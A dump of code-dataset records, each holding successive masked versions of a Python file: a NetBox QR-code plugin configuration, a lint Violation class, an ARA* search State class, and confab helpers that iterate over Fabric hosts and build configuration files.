"step-2": "<mask token>\n\n\nclass QRCodeConfig(PluginConfig):\n name = 'netbox_qrcode'\n verbose_name = 'qrcode'\n description = 'Generate QR codes for the objects'\n version = __version__\n author = 'Nikolay Yuzefovich'\n author_email = '[email protected]'\n required_settings = []\n default_settings = {'with_text': True, 'text_fields': ['name', 'serial'\n ], 'font': 'TahomaBold', 'custom_text': None, 'text_location':\n 'right', 'qr_version': 1, 'qr_error_correction': 0, 'qr_box_size': \n 6, 'qr_border': 4, 'device': {'text_fields': ['name', 'serial']},\n 'rack': {'text_fields': ['name']}, 'cable': {'text_fields': [\n '_termination_a_device', 'termination_a', '_termination_b_device',\n 'termination_b']}}\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass QRCodeConfig(PluginConfig):\n name = 'netbox_qrcode'\n verbose_name = 'qrcode'\n description = 'Generate QR codes for the objects'\n version = __version__\n author = 'Nikolay Yuzefovich'\n author_email = '[email protected]'\n required_settings = []\n default_settings = {'with_text': True, 'text_fields': ['name', 'serial'\n ], 'font': 'TahomaBold', 'custom_text': None, 'text_location':\n 'right', 'qr_version': 1, 'qr_error_correction': 0, 'qr_box_size': \n 6, 'qr_border': 4, 'device': {'text_fields': ['name', 'serial']},\n 'rack': {'text_fields': ['name']}, 'cable': {'text_fields': [\n '_termination_a_device', 'termination_a', '_termination_b_device',\n 'termination_b']}}\n\n\nconfig = QRCodeConfig\n",
"step-4": "from extras.plugins import PluginConfig\nfrom .version import __version__\n\n\nclass QRCodeConfig(PluginConfig):\n name = 'netbox_qrcode'\n verbose_name = 'qrcode'\n description = 'Generate QR codes for the objects'\n version = __version__\n author = 'Nikolay Yuzefovich'\n author_email = '[email protected]'\n required_settings = []\n default_settings = {'with_text': True, 'text_fields': ['name', 'serial'\n ], 'font': 'TahomaBold', 'custom_text': None, 'text_location':\n 'right', 'qr_version': 1, 'qr_error_correction': 0, 'qr_box_size': \n 6, 'qr_border': 4, 'device': {'text_fields': ['name', 'serial']},\n 'rack': {'text_fields': ['name']}, 'cable': {'text_fields': [\n '_termination_a_device', 'termination_a', '_termination_b_device',\n 'termination_b']}}\n\n\nconfig = QRCodeConfig\n",
"step-5": "from extras.plugins import PluginConfig\nfrom .version import __version__\n\n\nclass QRCodeConfig(PluginConfig):\n name = 'netbox_qrcode'\n verbose_name = 'qrcode'\n description = 'Generate QR codes for the objects'\n version = __version__\n author = 'Nikolay Yuzefovich'\n author_email = '[email protected]'\n required_settings = []\n default_settings = {\n 'with_text': True,\n 'text_fields': ['name', 'serial'],\n 'font': 'TahomaBold',\n 'custom_text': None,\n 'text_location': 'right',\n 'qr_version': 1,\n 'qr_error_correction': 0,\n 'qr_box_size': 6,\n 'qr_border': 4,\n 'device': {\n 'text_fields': ['name', 'serial']\n },\n 'rack': {\n 'text_fields': ['name']\n },\n 'cable': {\n 'text_fields': [\n '_termination_a_device',\n 'termination_a',\n '_termination_b_device',\n 'termination_b',\n ]\n }\n }\n\nconfig = QRCodeConfig # noqa E305\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
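The QRCodeConfig record above nests per-model overrides ('device', 'rack', 'cable') inside default_settings, each shadowing the top-level text_fields. A generic sketch of the lookup such a plugin might perform (illustrative only, not NetBox's actual settings API):

def setting_for(model, key, settings):
    # per-model override first, then fall back to the top-level default
    return settings.get(model, {}).get(key, settings.get(key))

defaults = {'text_fields': ['name', 'serial'], 'rack': {'text_fields': ['name']}}
print(setting_for('rack', 'text_fields', defaults))    # ['name']
print(setting_for('device', 'text_fields', defaults))  # ['name', 'serial']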
class Violation(object):
def __init__(self, line, column, code, message):
self.line = line
self.column = column
self.code = code
self.message = message
def __str__(self):
return self.message
def __repr__(self):
return 'Violation(line={}, column={}, code="{}", message="{}")'.format(
self.line, self.column, self.code, self.message)
|
normal
|
{
"blob_id": "c513ad6ef12ae7be5d17d8d44787691cbc065207",
"index": 9989,
"step-1": "class Violation(object):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class Violation(object):\n\n def __init__(self, line, column, code, message):\n self.line = line\n self.column = column\n self.code = code\n self.message = message\n <mask token>\n <mask token>\n",
"step-3": "class Violation(object):\n\n def __init__(self, line, column, code, message):\n self.line = line\n self.column = column\n self.code = code\n self.message = message\n\n def __str__(self):\n return self.message\n <mask token>\n",
"step-4": "class Violation(object):\n\n def __init__(self, line, column, code, message):\n self.line = line\n self.column = column\n self.code = code\n self.message = message\n\n def __str__(self):\n return self.message\n\n def __repr__(self):\n return 'Violation(line={}, column={}, code=\"{}\", message=\"{}\")'.format(\n self.line, self.column, self.code, self.message)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
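A short usage sketch for the Violation record above; the field values are made up for illustration:

v = Violation(line=12, column=5, code='E501', message='line too long')
print(v)        # __str__ returns just the message: line too long
print(repr(v))  # Violation(line=12, column=5, code="E501", message="line too long")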
<|reserved_special_token_0|>
class State:
<|reserved_special_token_0|>
def __init__(self, x, y, theta, parent=None, parent_action=None, g=
float('inf'), h=float('inf')):
self.x = x
self.y = y
self.theta = theta % (2 * math.pi)
self.g = g
self.h = h
self.parent = parent
self.parent_action = parent_action
<|reserved_special_token_0|>
def __hash__(self):
deg = round(math.degrees(self.theta))
return hash((self.x, self.y, deg))
def __lt__(self, other):
return self.g < other.g
def setG(self, g):
self.g = g
def setH(self, h):
self.h = h
def setParent(self, parent):
self.parent = parent
def setParentAction(self, parent_action):
self.parent_action = parent_action
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class State:
<|reserved_special_token_0|>
def __init__(self, x, y, theta, parent=None, parent_action=None, g=
float('inf'), h=float('inf')):
self.x = x
self.y = y
self.theta = theta % (2 * math.pi)
self.g = g
self.h = h
self.parent = parent
self.parent_action = parent_action
def __eq__(self, other):
if not isinstance(other, State):
return False
return self.x == other.x and self.y == other.y and almostEqual(self
.theta, other.theta)
def __hash__(self):
deg = round(math.degrees(self.theta))
return hash((self.x, self.y, deg))
def __lt__(self, other):
return self.g < other.g
def setG(self, g):
self.g = g
def setH(self, h):
self.h = h
def setParent(self, parent):
self.parent = parent
def setParentAction(self, parent_action):
self.parent_action = parent_action
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class State:
"""This class represents the search state that will be used for ARA* search"""
def __init__(self, x, y, theta, parent=None, parent_action=None, g=
float('inf'), h=float('inf')):
self.x = x
self.y = y
self.theta = theta % (2 * math.pi)
self.g = g
self.h = h
self.parent = parent
self.parent_action = parent_action
def __eq__(self, other):
if not isinstance(other, State):
return False
return self.x == other.x and self.y == other.y and almostEqual(self
.theta, other.theta)
def __hash__(self):
deg = round(math.degrees(self.theta))
return hash((self.x, self.y, deg))
def __lt__(self, other):
return self.g < other.g
def setG(self, g):
self.g = g
def setH(self, h):
self.h = h
def setParent(self, parent):
self.parent = parent
def setParentAction(self, parent_action):
self.parent_action = parent_action
<|reserved_special_token_1|>
from utils import *
import math
class State:
"""This class represents the search state that will be used for ARA* search"""
def __init__(self, x, y, theta, parent=None, parent_action=None, g=
float('inf'), h=float('inf')):
self.x = x
self.y = y
self.theta = theta % (2 * math.pi)
self.g = g
self.h = h
self.parent = parent
self.parent_action = parent_action
def __eq__(self, other):
if not isinstance(other, State):
return False
return self.x == other.x and self.y == other.y and almostEqual(self
.theta, other.theta)
def __hash__(self):
deg = round(math.degrees(self.theta))
return hash((self.x, self.y, deg))
def __lt__(self, other):
return self.g < other.g
def setG(self, g):
self.g = g
def setH(self, h):
self.h = h
def setParent(self, parent):
self.parent = parent
def setParentAction(self, parent_action):
self.parent_action = parent_action
<|reserved_special_token_1|>
from utils import *
import math
class State:
"This class represents the search state that will be used for ARA* search"
def __init__(self, x, y, theta, parent=None, parent_action=None, g=float('inf'), h=float('inf')):
self.x = x
self.y = y
self.theta = theta % (2*math.pi)
self.g = g
self.h = h
self.parent = parent
self.parent_action = parent_action
def __eq__(self, other):
if not isinstance(other, State):
return False
return (self.x == other.x) and (self.y == other.y) and (almostEqual(self.theta, other.theta))
def __hash__(self):
deg = round(math.degrees(self.theta))
return hash((self.x, self.y, deg))
def __lt__(self, other):
return self.g < other.g
def setG(self, g):
self.g = g
def setH(self, h):
self.h = h
def setParent(self, parent):
self.parent = parent
def setParentAction(self, parent_action):
self.parent_action = parent_action
|
flexible
|
{
"blob_id": "c8f899958ce19e7e2bf1307a685e65873695f140",
"index": 9028,
"step-1": "<mask token>\n\n\nclass State:\n <mask token>\n\n def __init__(self, x, y, theta, parent=None, parent_action=None, g=\n float('inf'), h=float('inf')):\n self.x = x\n self.y = y\n self.theta = theta % (2 * math.pi)\n self.g = g\n self.h = h\n self.parent = parent\n self.parent_action = parent_action\n <mask token>\n\n def __hash__(self):\n deg = round(math.degrees(self.theta))\n return hash((self.x, self.y, deg))\n\n def __lt__(self, other):\n return self.g < other.g\n\n def setG(self, g):\n self.g = g\n\n def setH(self, h):\n self.h = h\n\n def setParent(self, parent):\n self.parent = parent\n\n def setParentAction(self, parent_action):\n self.parent_action = parent_action\n",
"step-2": "<mask token>\n\n\nclass State:\n <mask token>\n\n def __init__(self, x, y, theta, parent=None, parent_action=None, g=\n float('inf'), h=float('inf')):\n self.x = x\n self.y = y\n self.theta = theta % (2 * math.pi)\n self.g = g\n self.h = h\n self.parent = parent\n self.parent_action = parent_action\n\n def __eq__(self, other):\n if not isinstance(other, State):\n return False\n return self.x == other.x and self.y == other.y and almostEqual(self\n .theta, other.theta)\n\n def __hash__(self):\n deg = round(math.degrees(self.theta))\n return hash((self.x, self.y, deg))\n\n def __lt__(self, other):\n return self.g < other.g\n\n def setG(self, g):\n self.g = g\n\n def setH(self, h):\n self.h = h\n\n def setParent(self, parent):\n self.parent = parent\n\n def setParentAction(self, parent_action):\n self.parent_action = parent_action\n",
"step-3": "<mask token>\n\n\nclass State:\n \"\"\"This class represents the search state that will be used for ARA* search\"\"\"\n\n def __init__(self, x, y, theta, parent=None, parent_action=None, g=\n float('inf'), h=float('inf')):\n self.x = x\n self.y = y\n self.theta = theta % (2 * math.pi)\n self.g = g\n self.h = h\n self.parent = parent\n self.parent_action = parent_action\n\n def __eq__(self, other):\n if not isinstance(other, State):\n return False\n return self.x == other.x and self.y == other.y and almostEqual(self\n .theta, other.theta)\n\n def __hash__(self):\n deg = round(math.degrees(self.theta))\n return hash((self.x, self.y, deg))\n\n def __lt__(self, other):\n return self.g < other.g\n\n def setG(self, g):\n self.g = g\n\n def setH(self, h):\n self.h = h\n\n def setParent(self, parent):\n self.parent = parent\n\n def setParentAction(self, parent_action):\n self.parent_action = parent_action\n",
"step-4": "from utils import *\nimport math\n\n\nclass State:\n \"\"\"This class represents the search state that will be used for ARA* search\"\"\"\n\n def __init__(self, x, y, theta, parent=None, parent_action=None, g=\n float('inf'), h=float('inf')):\n self.x = x\n self.y = y\n self.theta = theta % (2 * math.pi)\n self.g = g\n self.h = h\n self.parent = parent\n self.parent_action = parent_action\n\n def __eq__(self, other):\n if not isinstance(other, State):\n return False\n return self.x == other.x and self.y == other.y and almostEqual(self\n .theta, other.theta)\n\n def __hash__(self):\n deg = round(math.degrees(self.theta))\n return hash((self.x, self.y, deg))\n\n def __lt__(self, other):\n return self.g < other.g\n\n def setG(self, g):\n self.g = g\n\n def setH(self, h):\n self.h = h\n\n def setParent(self, parent):\n self.parent = parent\n\n def setParentAction(self, parent_action):\n self.parent_action = parent_action\n",
"step-5": "from utils import *\nimport math\n\nclass State:\n \"This class represents the search state that will be used for ARA* search\"\n def __init__(self, x, y, theta, parent=None, parent_action=None, g=float('inf'), h=float('inf')):\n self.x = x\n self.y = y\n self.theta = theta % (2*math.pi)\n self.g = g\n self.h = h\n self.parent = parent\n self.parent_action = parent_action\n\n def __eq__(self, other):\n if not isinstance(other, State):\n return False\n return (self.x == other.x) and (self.y == other.y) and (almostEqual(self.theta, other.theta))\n\n def __hash__(self):\n deg = round(math.degrees(self.theta))\n return hash((self.x, self.y, deg))\n\n def __lt__(self, other):\n return self.g < other.g\n\n def setG(self, g):\n self.g = g\n def setH(self, h):\n self.h = h\n def setParent(self, parent):\n self.parent = parent\n def setParentAction(self, parent_action):\n self.parent_action = parent_action\n",
"step-ids": [
8,
9,
10,
11,
12
]
}
|
[
8,
9,
10,
11,
12
] |
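Because __lt__ in the State record above compares by path cost g, instances order correctly in a binary heap, which is what an ARA*-style open list needs. Note also that __hash__ rounds theta to whole degrees while __eq__ uses almostEqual, so two states that compare equal right at a half-degree rounding boundary could hash differently. A small heap-ordering sketch, assuming the State class (and its utils dependency) is importable:

import heapq
import math

open_list = []
heapq.heappush(open_list, State(0, 0, 0.0, g=5.0))
heapq.heappush(open_list, State(1, 0, math.pi, g=2.0))
print(heapq.heappop(open_list).g)  # 2.0 -- the lowest-g state pops first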
<|reserved_special_token_0|>
def _get_environmentdef():
"""
    Retrieve the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort('Environment needs to be configured')
environmentdef = env.environmentdef
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
with this_hostname(host.host):
yield host
<|reserved_special_token_0|>
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),
directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*
templates_dirs), DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group='confab.extensions'):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _get_environmentdef():
"""
    Retrieve the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort('Environment needs to be configured')
environmentdef = env.environmentdef
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
with this_hostname(host.host):
yield host
def iter_hosts_and_roles():
"""
Iterate over all hosts and roles in the configured environment.
"""
environmentdef = _get_environmentdef()
for host_and_role in environmentdef.all():
with this_hostname(host_and_role.host):
yield host_and_role
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),
directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*
templates_dirs), DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group='confab.extensions'):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@contextmanager
def this_hostname(hostname):
"""
    Context manager that uses the current SSH config to switch Fabric to a specific hostname.
Updates hostname and port.
"""
host_config = ssh_config(hostname)
host_string = hostname
port = host_config.get('port', env.default_port)
with settings(host_string=host_string, port=port):
yield
def _get_environmentdef():
"""
    Retrieve the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort('Environment needs to be configured')
environmentdef = env.environmentdef
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
with this_hostname(host.host):
yield host
def iter_hosts_and_roles():
"""
Iterate over all hosts and roles in the configured environment.
"""
environmentdef = _get_environmentdef()
for host_and_role in environmentdef.all():
with this_hostname(host_and_role.host):
yield host_and_role
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),
directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*
templates_dirs), DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group='confab.extensions'):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from contextlib import contextmanager
from fabric.api import env, settings, abort
from os.path import join
from pkg_resources import iter_entry_points
from warnings import warn
from fabric.network import ssh_config
from confab.options import options
from confab.validate import assert_exists
from confab.loaders import FileSystemEnvironmentLoader
from confab.data import DataLoader
from confab.conffiles import ConfFiles
@contextmanager
def this_hostname(hostname):
"""
    Context manager that uses the current SSH config to switch Fabric to a specific hostname.
Updates hostname and port.
"""
host_config = ssh_config(hostname)
host_string = hostname
port = host_config.get('port', env.default_port)
with settings(host_string=host_string, port=port):
yield
def _get_environmentdef():
"""
    Retrieve the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort('Environment needs to be configured')
environmentdef = env.environmentdef
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
with this_hostname(host.host):
yield host
def iter_hosts_and_roles():
"""
Iterate over all hosts and roles in the configured environment.
"""
environmentdef = _get_environmentdef()
for host_and_role in environmentdef.all():
with this_hostname(host_and_role.host):
yield host_and_role
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),
directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*
templates_dirs), DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group='confab.extensions'):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
<|reserved_special_token_1|>
"""
Iterations over :term:`hosts<host>`, :term:`roles<role>`,
:term:`components<component>` and config files.
"""
from contextlib import contextmanager
from fabric.api import env, settings, abort
from os.path import join
from pkg_resources import iter_entry_points
from warnings import warn
from fabric.network import ssh_config
from confab.options import options
from confab.validate import assert_exists
from confab.loaders import FileSystemEnvironmentLoader
from confab.data import DataLoader
from confab.conffiles import ConfFiles
@contextmanager
def this_hostname(hostname):
"""
    Context manager that uses the current SSH config to switch Fabric to a specific hostname.
Updates hostname and port.
"""
host_config = ssh_config(hostname)
host_string = hostname
port = host_config.get("port", env.default_port)
with settings(host_string=host_string,
port=port):
yield
def _get_environmentdef():
"""
    Retrieve the EnvironmentDefinition from the fabric env.
"""
if 'environmentdef' not in env:
abort("Environment needs to be configured")
environmentdef = env.environmentdef
# If we're running via `fab`, we should restrict the environment
# to the current host.
if env.host_string:
environmentdef = environmentdef.with_hosts(env.host_string)
return environmentdef
def iter_hosts():
"""
Iterate over all hosts in the configured environment.
"""
environmentdef = _get_environmentdef()
for host in environmentdef.hosts():
# fabric needs the host if we're calling from main()
with this_hostname(host.host):
yield host
def iter_hosts_and_roles():
"""
Iterate over all hosts and roles in the configured environment.
"""
environmentdef = _get_environmentdef()
for host_and_role in environmentdef.all():
# fabric needs the host if we're calling from main()
with this_hostname(host_and_role.host):
yield host_and_role
def iter_conffiles(directory=None):
"""
Generate :class:`~confab.conffiles.ConfFiles` objects for each
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
for host_and_role in iter_hosts_and_roles():
yield make_conffiles(host_and_role, directory)
def make_conffiles(host_and_role, directory=None):
"""
Create a :class:`~confab.conffiles.ConfFiles` object for a
``host_and_role`` in an :term:`environment`.
Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and
:class:`~confab.data.DataLoader`.
:param directory: Path to templates and data directories.
"""
directories = [directory or options.get_base_dir()]
directories.extend(iter_extension_paths())
# Construct directories
templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()), directories)
assert_exists(*templates_dirs)
data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)
assert_exists(*data_dirs)
return ConfFiles(host_and_role,
FileSystemEnvironmentLoader(*templates_dirs),
DataLoader(data_dirs))
def iter_extension_paths():
"""
Get templates paths from confab extension entry points.
entry points should point to a callable that returns the base path
to the data and templates directories.
"""
for entry_point in iter_entry_points(group="confab.extensions"):
try:
path_func = entry_point.load()
yield path_func()
except ImportError as e:
warn(str(e))
|
flexible
|
{
"blob_id": "cc019c732003ed72db80a7893096a0bef0f12e47",
"index": 4168,
"step-1": "<mask token>\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\n<mask token>\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-2": "<mask token>\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-3": "<mask token>\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n host_string = hostname\n port = host_config.get('port', env.default_port)\n with settings(host_string=host_string, port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n 